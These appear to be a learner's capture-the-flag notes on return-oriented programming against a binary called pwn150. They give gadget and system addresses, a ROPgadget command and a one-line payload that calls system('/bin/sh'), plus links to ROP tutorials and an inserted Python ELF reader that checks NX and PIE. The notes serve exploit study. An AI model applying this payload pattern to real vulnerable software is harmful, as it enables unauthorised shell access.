
ROP Notes

system address (from gdb):
p system
4008a8
6008a8

/bin/sh string:
gdb: run the binary to start, then find sh in memory
or, with pwntools:
elf.get_section_by_name('.dynsym').header['sh_addr']

pop rdi; ret gadget:
ROPgadget --binary ./pwn150 --only "pop|ret"
0x400883
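The pwntools one-liner above reads the address of a section straight out of the ELF section header table. As an added example (not part of these notes or of pwntools), the following pure-Python reader does the same job for little-endian ELF64 files and also reports the two mitigations that decide whether the techniques in these notes apply at all: NX (a non-executable stack, signalled by the PT_GNU_STACK program header) and PIE (an ET_DYN executable whose addresses move with ASLR). The ELF image it parses is hand-assembled in _build_sample from headers only, with constructed addresses; the function names are my own.

```python
"""Minimal ELF64 section/segment reader (added example, not pwntools code).
The sample image is constructed by hand: only headers, no real code."""
import struct

ELF_MAGIC = b"\x7fELF"
PT_LOAD, PT_GNU_STACK = 1, 0x6474E551
PF_X = 1
ET_EXEC, ET_DYN = 2, 3


def _read_cstr(blob, off):
    """NUL-terminated string starting at offset off."""
    return blob[off:blob.index(b"\x00", off)].decode()


def parse_elf64(data):
    """Return (e_type, {section name: header fields}, [program headers])."""
    if data[:4] != ELF_MAGIC or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    # e_ident occupies bytes 0..15; the remaining 48 header bytes follow.
    (e_type, _mach, _ver, _entry, phoff, shoff, _flags, _ehsize,
     phentsize, phnum, shentsize, shnum, shstrndx) = struct.unpack_from(
        "<HHIQQQIHHHHHH", data, 16)
    raw_sh = [struct.unpack_from("<IIQQQQIIQQ", data, shoff + i * shentsize)
              for i in range(shnum)]
    # Section names live in .shstrtab, whose index is e_shstrndx.
    strtab_off = raw_sh[shstrndx][4]
    sections = {}
    for sh in raw_sh:
        name = _read_cstr(data, strtab_off + sh[0])
        if name:
            sections[name] = {"addr": sh[3], "offset": sh[4], "size": sh[5]}
    segments = [struct.unpack_from("<IIQQQQQQ", data, phoff + i * phentsize)
                for i in range(phnum)]
    return e_type, sections, segments


def section_addr(data, name):
    """Same value as elf.get_section_by_name(name).header['sh_addr']."""
    return parse_elf64(data)[1][name]["addr"]


def mitigations(data):
    """checksec-style summary: NX stack present, and PIE (ASLR moves code)."""
    e_type, _, segments = parse_elf64(data)
    stack = [seg for seg in segments if seg[0] == PT_GNU_STACK]
    # A missing PT_GNU_STACK header means the loader may fall back to an
    # executable stack, so it is reported as NX off as well.
    nx = bool(stack) and not (stack[0][1] & PF_X)
    return {"nx": nx, "pie": e_type == ET_DYN}


def _build_sample(nx_stack=True, pie=False):
    """Hand-assemble a tiny ELF64 image (constructed, headers only) whose
    .dynsym section sits at base+0x280; offsets beyond the headers are fake."""
    shstrtab = b"\x00.dynsym\x00.text\x00.shstrtab\x00"
    names = {".dynsym": 1, ".text": 9, ".shstrtab": 15}
    phoff, phnum, shnum = 64, 2, 4
    str_off = phoff + phnum * 56
    shoff = (str_off + len(shstrtab) + 15) & ~15
    base = 0 if pie else 0x400000

    def shdr(name, typ, flags, addr, off, size):
        return struct.pack("<IIQQQQIIQQ", name, typ, flags, addr, off, size, 0, 0, 1, 0)

    def phdr(typ, flags, vaddr, size):
        return struct.pack("<IIQQQQQQ", typ, flags, 0, vaddr, vaddr, size, size, 0x1000)

    header = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\x00" * 8
    header += struct.pack("<HHIQQQIHHHHHH", ET_DYN if pie else ET_EXEC, 0x3E, 1,
                          base + 0x500, phoff, shoff, 0, 64, 56, phnum, 64, shnum, 3)
    phdrs = phdr(PT_LOAD, 5, base, 0x1000)                     # R+X text segment
    phdrs += phdr(PT_GNU_STACK, 6 if nx_stack else 7, 0, 0)    # RW (NX) or RWX stack
    shdrs = shdr(0, 0, 0, 0, 0, 0)                             # mandatory null entry
    shdrs += shdr(names[".dynsym"], 11, 2, base + 0x280, 0x280, 0x60)    # SHT_DYNSYM
    shdrs += shdr(names[".text"], 1, 6, base + 0x500, 0x500, 0x100)      # SHT_PROGBITS
    shdrs += shdr(names[".shstrtab"], 3, 0, 0, str_off, len(shstrtab))  # SHT_STRTAB
    image = header + phdrs + shstrtab
    return image + b"\x00" * (shoff - len(image)) + shdrs


if __name__ == "__main__":
    img = _build_sample()
    print(hex(section_addr(img, ".dynsym")), mitigations(img))
```

Run it on a real file by replacing _build_sample() with open(path, "rb").read(); a binary reported as pie=True is the case where the fixed addresses collected in these notes are no longer valid across runs.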

Reference:
basic ROP:
http://www.cnblogs.com/0xJDchen/p/6175651.html

ROP x64:
http://yunnigu.dropsec.xyz/2016/11/21/pwn%E5%AD%A6%E4%B9%A0rop%E4%B9%8Bx64%E7%AF%87/
Main point:
payload = "\x00"*136 + p64(pop_pop_call_addr) + p64(system_addr) + p64(binsh_addr)
pop rdi; ret

pop pop pop, write to .bss:
http://yunnigu.dropsec.xyz/2016/11/19/pwn%E5%AD%A6%E4%B9%A0%E4%B9%8BDynELF%E7%9A%84%E4%BD%BF%E7%94%A8/

return to dl (bypass ASLR + DEP):
https://zhuanlan.zhihu.com/p/23255727

x64 with libc provided:
http://bobao.360.cn/learning/detail/3300.html
